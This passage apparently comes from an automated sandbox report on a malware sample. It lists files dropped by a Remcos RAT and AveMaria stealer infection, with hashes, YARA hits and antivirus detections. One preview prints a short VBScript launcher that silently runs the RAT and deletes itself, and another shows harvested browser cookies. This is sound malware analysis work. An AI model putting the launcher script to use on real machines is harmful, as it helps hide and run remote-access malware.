                                                                                              Category:dropped
                                                                                              Size (bytes):916
                                                                                              Entropy (8bit):5.282390836641403
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:MLF20NaL3z2p29hJ5g522rW2xAi3AP26K95rKoO2+g2+:MwLLD2Y9h3go2rxxAcAO6ox+g2+
                                                                                              MD5:5AD8E7ABEADADAC4CE06FF693476581A
                                                                                              SHA1:81E42A97BBE3D7DE8B1E8B54C2B03C48594D761E
                                                                                              SHA-256:BAA1A28262BA27D51C3A1FA7FB0811AD1128297ABB2EDCCC785DC52667D2A6FD
                                                                                              SHA-512:7793E78E84AD36CE65B5B1C015364E340FB9110FAF199BC0234108CE9BCB1AEDACBD25C6A012AC99740E08BEA5E5C373A88E553E47016304D8AE6AEEAB58EBFF
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\35774dc3cd31b4550ab06c3354cf4ba5\System.Runtime.Remoting.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\de460308a9099237864d2ec2328fc958\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\527c933194f3a99a816d83c619a3e1d3\System.Xml.ni.dll",0..
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Droppertodownloa[1].exe
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):2351104
                                                                                              Entropy (8bit):7.506766900421548
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:AW3dW0e3O2oWFaLcZig+bnDPXqWtex9vtVl:AW3dWJloWFaLcZig+j2WcxLVl
                                                                                              MD5:32EB10C12A29B38F13730CD1F5DCAD4D
                                                                                              SHA1:4D0EB488A01FED1720483DFA270423BEA593CA14
                                                                                              SHA-256:06550442678FB92B0273B83F349D47D3654FB72A7D98398CE3B63E3635B8E8F1
                                                                                              SHA-512:1E95F1A74B7F2DCDE31B661AAD078373DD757B689EE02E35E36090777A1B92CF7564271FC577DF529C6E7C77B3D294CCE0FD913243A7DF6DC6ACC2F58C2FB6C5
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):22288
                                                                                              Entropy (8bit):5.344169070723195
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:ptCDSmWYc1mJVovSKrnVrf1JNc7nudlu5cOOhhrm1dOty3aC:sWWB6ntXSbudl8cOgrqqa
                                                                                              MD5:2ED533489ED94BD3334F607D0E4D17D9
                                                                                              SHA1:0B5874B7F26C3800EEEE97B8B7FEF2FE287D4F3C
                                                                                              SHA-256:25F723622BDBA89C1D9E30FA05CA7A5613DA6EDBF3D2F23FDE75D3851929099A
                                                                                              SHA-512:6F908BA0AAD19FB53DA1144D2952F28A80776133083DD13049FFB49BD366686681893009D516F07744E08AFA2ED475E0244B9E4C1A555A7BF9963A30F1B3EB55
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: @...e...........|.......h.:.-.%.".......U.I..........@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                              C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\dwn.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):900994
                                                                                              Entropy (8bit):7.560706052049211
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:cDpCT3m/baIGgI+ZdBE07uAAL3UfN5qsP6dudK5Yk7Er2nNuviB4CFG:E4H2xZdW0CAU3CNr3dKGr2ozCFG
                                                                                              MD5:6C9447A6F1B04C75D95594338AE61E06
                                                                                              SHA1:F2EBF6D355F30512AB1E92CAB9525A94F99BFEC5
                                                                                              SHA-256:810781308E53BE9C2ACA613FB67EF7E577896DE69A2C2DEFF387A0763EAA2AE6
                                                                                              SHA-512:ABD10D8DBB5097C5C09B8C498AEDE589A6B0EE20EAB03C615F84ADFDA61E87D63FACBA9CB53E117AE1E84B73DD4DE9A49236EDC5B17330FC73779A4124033616
                                                                                              Malicious:true
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\4.exe
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\dwn.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):586861
                                                                                              Entropy (8bit):7.360391735779929
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:Khzfld/fqWhWxlXWx/0tTJwbxlKzMbDtz6yrkvtVm:SPXqWtGtTOl0zM/6vtVm
                                                                                              MD5:78EDE0254C66FA9E667E4CEB88754E1C
                                                                                              SHA1:385599DCC3260AC9BB782DA9AB0C69A7BB541645
                                                                                              SHA-256:A542D2953BB5F7516342E100BB01447371CDF7BAF2FD300D61B52D4D2E323DC1
                                                                                              SHA-512:39B30A1AEA89DB0E30A208157B4E606463CAEC72E66D231EDBEC22044E8C66E09674C66D36E2AF363352735D0387C050BC73AEBA47D254ACFE0AB2D9C7965203
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\dwn.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):852277
                                                                                              Entropy (8bit):7.535786145318411
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:WOe0qo8EWUK1CLF54EMctn6zleqHXFD/ABuqYrNav+qSz4SglH2zbr:WpZwW9cxjn6z917Nq+BVcSg12r
                                                                                              MD5:3F332B62EEE0970F3189C689D5BD042A
                                                                                              SHA1:F68F7DCC8FFCDD3F93333E711779E8D02DB2DFAE
                                                                                              SHA-256:7C7983ADA08828EA0C0ED5B17B05F8DAD5BF6FA44E1A4692C37F18C340E14219
                                                                                              SHA-512:2399BF335B60B87D1126B7CD663DFD937BE0DA7FEF815225D53940E5D01CF4B02969DC33D75E7B1F5F63B3233ED1EA179CC517C1C4639802293E4EA8CF25D5EF
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\84a79tbwxmvn7adt
                                                                                              Process:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):604159
                                                                                              Entropy (8bit):7.96721366302899
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:uL2jvzmCP0rI7B+0G36tX8j6FTkYcwpWFt7tVYkfv:uCjrml0hGqtXiuT5WX7zYk3
                                                                                              MD5:71353B7F9141FA3C5760ACE513F8C385
                                                                                              SHA1:A6DD26880269F3FAEADA77C5F74ADE2433AF78C3
                                                                                              SHA-256:FC517290096122DB50FF785F3E3FCE641EF2164EA93351A8655A43732344BF7C
                                                                                              SHA-512:CDD0A4C4278D24019837811E429312D572BEC638812B5C35EA52CAFB443719974E7C614216A499D1008F843F021E06F1F3B6AD6E66082E616EC14D876C8108C0
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\8tps30shve
                                                                                              Process:C:\Users\user\Desktop\xxTzyGLZx5.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):602111
                                                                                              Entropy (8bit):7.978364442659117
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:LX+3nVWt54yfDnFQA6NnOrPyTCtAoPC12g+srrZ4pTPLYQ4rq4:LX+3VWt5hSApOCt2+suPLYQ4P
                                                                                              MD5:A237795B8A0EAE5B9D60471CEE202780
                                                                                              SHA1:38FBA9CC6CAA3BA28008A7B54D92B285EC3F7301
                                                                                              SHA-256:D00E1D2E29582CF8734B4B392C8B0015D40714B7EA1C4724CEDCC1E3D53473D5
                                                                                              SHA-512:338C9BA4F7785297DE2F33037117FD5CE138E7772BE1F2A20A21C14458F252494101A19C0D6E95FE01542F6C6D8ABDBE9C140F15193FD652EB0D89DBDFDDCBB0
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\KGa06088
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:Zip archive data, at least v2.0 to extract
                                                                                              Category:dropped
                                                                                              Size (bytes):6868
                                                                                              Entropy (8bit):7.811153415048189
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:U6Cw3XxQfMpKAxQfMpKiCdzUpPRCdzUpPwiJX5VjUuQ3+RTaXI3+RTaX/Bb4o8/6:U6bQKQyCdzUbCdzUdPjjE+ws+wvB6MVz
                                                                                              MD5:9D1FA086471D9B21684DB17E22C6BDF2
                                                                                              SHA1:18ECCA6670697FC37D596E5173BA38EDC0376BDF
                                                                                              SHA-256:9008E8B54DC2B58F75670C2A118DEC964587CA6EA4389F0EF00495C633C63813
                                                                                              SHA-512:ADC903E5B0C970B226BB9D0DA7B9DDE1A2B012781A43A3771ED864570513D4D366B9AE97F96ADD8190223CD2F16DB56D0770E6057D980E38A3CB50C4A8B9BD3F
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\SysInfo.txt
                                                                                              Process:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):39
                                                                                              Entropy (8bit):4.17298996283009
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:oNt+kiE2J5xAI6N:oNwkn23fO
                                                                                              MD5:9E92E8C8C14C21B4E23FD6E21DBCF5F2
                                                                                              SHA1:5E42F7A627F3E0FE4D270107658BF3B29AB97D33
                                                                                              SHA-256:5895259ADC1CF2B32B2961697587BBFCFB6E88D4662816980BF4BE654EFDBCFC
                                                                                              SHA-512:29F537CE20708BAD2E8D70F3EBA4040452070A15B3312A543605BDE55DD4EC72E023274D69FABC14D4DEAC3628CB407EE4A15C67776C5C30990200879CE9CC36
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enwkj00w.kq1.psm1
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: 1
                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrn55b2l.mfa.ps1
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: 1
                                                                                              C:\Users\user\AppData\Local\Temp\bhv9034.tmp
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x13ce402f, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                              Category:dropped
                                                                                              Size (bytes):29884416
                                                                                              Entropy (8bit):0.9935866017056032
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:esPwt8HVmyajw7811fXy7R4aUpPX7Cr6f63rsLOZ:bKyajrO
                                                                                              MD5:75B7BD98F1ECA326D60B87C6C8757180
                                                                                              SHA1:B0E619E0F7ED39A86F16F8EF2BFCBADCC02504AA
                                                                                              SHA-256:84D6B18A806039FEA05FB2C48F05339A55F1C818B1331424FE5C72CD94F696EF
                                                                                              SHA-512:59A444986AA0F1C2B86A0F1260D0C6872138B60AEA78FCB8813987A8B15C005753D80094DD5EE353CB945D4F3E962BC8C4137866E94C7DD4E107A4FCE44FC7E3
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              Process:C:\Users\user\Desktop\xxTzyGLZx5.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):115712
                                                                                              Entropy (8bit):6.375962866007663
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:h0jP7/L1B5rVmN8sxHv2M28ix8EUaJxWZoB4u0OVE01:K1VmhaH8EFvW+0OVE0
                                                                                              MD5:805FBB84293E86F25B566A5B2C2815D2
                                                                                              SHA1:5712F69EAFCA434E4D6CDFD8081EBFB728708C25
                                                                                              SHA-256:E78FCD503A6B0A663AB4A72B97C010C932840998DA05784BA75F7D6802EA822F
                                                                                              SHA-512:5927584ABABC4C2D533984C607A96590D1640B6939D33E9F994B684F38F1541DFDC1D0778F5DBE586353C46BEBC3A7F0E46A1156F34E5748AB31FF0AF16807A2
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Florian Roth
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Florian Roth
                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Joe Security
                                                                                              • Rule: AveMaria_WarZone, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: unknown
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\c1cbn8ydb22
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):679935
                                                                                              Entropy (8bit):7.985731057036001
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:DYUImlFPDAriO+Za0AnZ7sLbGZ9ARLEUfi5qPP6QudMoYjlEr2na:Dh/Fcr3T0uKKDAdECimwdMwr2a
                                                                                              MD5:5022658720DC7BBAF4A2A177292C1AED
                                                                                              SHA1:722AAF02F5198029E2A91A93BD204F62E71BD77C
                                                                                              SHA-256:F62E47CBD04EF2E3488B98BD3C473218D97D2D2B46B6B49C874AAE439961BD5A
                                                                                              SHA-512:72289FDB58AD4EDE39CB3620FFE2E929FD9FC76F17FF46491425BE73E255FD5244CEBD27B579963A8703C7DD2AC9D3A4D63EC6F98F87E83FE0F4F5DBDBED3708
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\install.vbs
                                                                                              Process:C:\Users\user\AppData\Local\Temp\rem9090sta.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):418
                                                                                              Entropy (8bit):3.4717335207921964
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:4D8o++ugypjBQMBvFQ4lObRKMJhpE2F0M/0aimi:4Dh+S0FNObrBE2F0Nait
                                                                                              MD5:8F4068DE9C38C97EDB3E3B5467C4F1D4
                                                                                              SHA1:1F6B751A293FAA36A9C48D18DCF1976040D84511
                                                                                              SHA-256:3CCF7A29F9803E439B43337399580DE0CEDB0B5AED1ECDC7107E14FED6ADDD1E
                                                                                              SHA-512:C647221649FF7B067F0C9D6F4B7BAAAA1D9ECE08883DBE887C042D0F35BE9728A966BCC5F9D06292617258E459506918CA17DDCE0F1DD529604E5631770433A8
                                                                                              Malicious:true
                                                                                              Reputation:unknown
                                                                                              Preview:
                                                                                              WScript.Sleep 1000
                                                                                              Set fso = CreateObject("Scripting.FileSystemObject")
                                                                                              CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\jones\AppData\Roaming\Remcos\remcos.exe""", 0
                                                                                              fso.DeleteFile(Wscript.ScriptFullName)
                                                                                              C:\Users\user\AppData\Local\Temp\jmtceghqeepjeivm
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):2
                                                                                              Entropy (8bit):1.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Qn:Qn
                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ..
                                                                                              C:\Users\user\AppData\Local\Temp\nsaAFFF.tmp\rgsbzeog.dll
                                                                                              Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):159744
                                                                                              Entropy (8bit):6.52147420132688
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:MO9DZ1DVIbQwhPUfwNRcqz3+dpHquOt/l:MaN1JyQoPMa3+FSl
                                                                                              MD5:C16079C8EB03B8859CDFFD31F4137C80
                                                                                              SHA1:4F76339C9DE64C0D0943C06AD7FC4D499FB2ACBB
                                                                                              SHA-256:0C9930C5091E500AB5EDF26F6D3BA85BAB02C65DBDE677068B0943308F29FEAB
                                                                                              SHA-512:6B4864972150C271D45A58DD5F7CBCD2EADB691A62D65957A5B76DE1EAE7D00D7D996CBCD6EB45F20F6CFFA42AA68190DCA52E2D5A4324B8D9BA90E24BEE6404
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\nslA5A0.tmp\rgsbzeog.dll
                                                                                              Process:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):159744
                                                                                              Entropy (8bit):6.52147420132688
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:MO9DZ1DVIbQwhPUfwNRcqz3+dpHquOt/l:MaN1JyQoPMa3+FSl
                                                                                              MD5:C16079C8EB03B8859CDFFD31F4137C80
                                                                                              SHA1:4F76339C9DE64C0D0943C06AD7FC4D499FB2ACBB
                                                                                              SHA-256:0C9930C5091E500AB5EDF26F6D3BA85BAB02C65DBDE677068B0943308F29FEAB
                                                                                              SHA-512:6B4864972150C271D45A58DD5F7CBCD2EADB691A62D65957A5B76DE1EAE7D00D7D996CBCD6EB45F20F6CFFA42AA68190DCA52E2D5A4324B8D9BA90E24BEE6404
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\nst9F76.tmp\orwglwkinzb.dll
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):159744
                                                                                              Entropy (8bit):6.517636244325897
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:7hzc53Ocai7Llp7SW5LuHa6cRbTLGhwTVPXu9pFI5QnJqz5y8E/Ztkh0W0wsWjce:7hQ0cj66JRihwTlV2IHE/V9rqs9uOP
                                                                                              MD5:5E22EEE55114158A4923FE7F8BC9F053
                                                                                              SHA1:AB3E35814486EC8AC7CB41DDADC219EC696C2707
                                                                                              SHA-256:2495D9B36FCD65282D7752BDFF2FD286A27D1F70965F9DF45DB0D818E03CDD02
                                                                                              SHA-512:557B8E36F6482F6A4903B8282A556D5D579A653E0CB94643019997A645ABED1EA39AA09E7DC70EC535F2A2CB0DE14193AF378F6792BF690B862F1E1F6C01DB6B
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\nsuAEE7.tmp\kqkz.dll
                                                                                              Process:C:\Users\user\AppData\Local\Temp\4.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):160256
                                                                                              Entropy (8bit):6.538000111857781
                                                                                              Encrypted:false
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\nszE2AE.tmp\sozz.dll
                                                                                              Process:C:\Users\user\Desktop\xxTzyGLZx5.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):159744
                                                                                              Entropy (8bit):6.539189721002538
                                                                                              Encrypted:false
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\rem9090sta.exe
                                                                                              Process:C:\Users\user\Desktop\xxTzyGLZx5.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):474112
                                                                                              Entropy (8bit):6.580639305620245
                                                                                              Encrypted:false
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, Author: Joe Security
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, Author: unknown
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\tmpG77.tmp (copy)
                                                                                              Process:C:\Users\user\AppData\Local\Temp\4.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):586861
                                                                                              Entropy (8bit):7.360391735779929
                                                                                              Encrypted:false
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Local\Temp\wfkc2ng2j1zi47wu
                                                                                              Process:C:\Users\user\AppData\Local\Temp\4.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):292351
                                                                                              Entropy (8bit):7.962109927544079
                                                                                              Encrypted:false
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Fhg.xgx.tmp
                                                                                              Process:C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                              Category:dropped
                                                                                              Size (bytes):40960
                                                                                              Entropy (8bit):0.792852251086831
                                                                                              Encrypted:false
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: SQLite format
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\BURPLQ1DAW.zip
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:Zip archive data, at least v2.0 to extract
                                                                                              Category:dropped
                                                                                              Size (bytes):335116
                                                                                              Entropy (8bit):7.99865634158973
                                                                                              Encrypted:true
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\CookiesChrome.txt
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):890
                                                                                              Entropy (8bit):4.902160711477108
                                                                                              Encrypted:false
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: [{.. "Host raw": "https://.google.com",.. "Name raw": "NID",.. "Path raw": "/",.. "Content raw": "7631303F5C3A3F555E563F3F143F343F3F20653F4B657A3F3F3F3F4410073F713F193F52783F3F593C3F533F03123F3F073F2A3F2D3F183F523F3F473F633F4A3F0C3F3F3F3F3F1E3F3F5A3F34443F603F6D3F15703F3F0868053F3F183F07763F423F703F1E273F18117D7E4B3F3F360A3F3F053F376A3F3F3F3F703F3F64563F3F62283F381A7160507A3F3F3F3F5D3F423F3F3F4A3F3F20483F3F253F3F42595B3F46323F323F0C4D073F4E3F3F543F4A3F3F623F3F5B683F3F4A213F1B3F56713F26",.. "Expires": "12:00:00 AM",.. "Expires raw": "13261735795164740",.. "Send for": "Any type of connection",.. "Send for raw": "false",.. "HTTP only raw": "false",.. "SameSite raw": "no_restriction",.. "This domain only": "Valid for subdomains",.. "This domain only raw": "false",.. "Store raw": "firefox-default",.. "First Party Domain": ""..},..{....}]....
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files.zip
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:Zip archive data (empty)
                                                                                              Category:dropped
                                                                                              Size (bytes):24
                                                                                              Entropy (8bit):1.4575187496394222
                                                                                              Encrypted:false
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: PK......................
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files.zip~RF421d9e0.TMP (copy)
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:Zip archive data (empty)
                                                                                              Category:dropped
                                                                                              Size (bytes):24
                                                                                              Entropy (8bit):1.4575187496394222
                                                                                              Encrypted:false
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: PK......................
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\LSBIHQFDVT.pdf
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.698193102830694
                                                                                              Encrypted:false
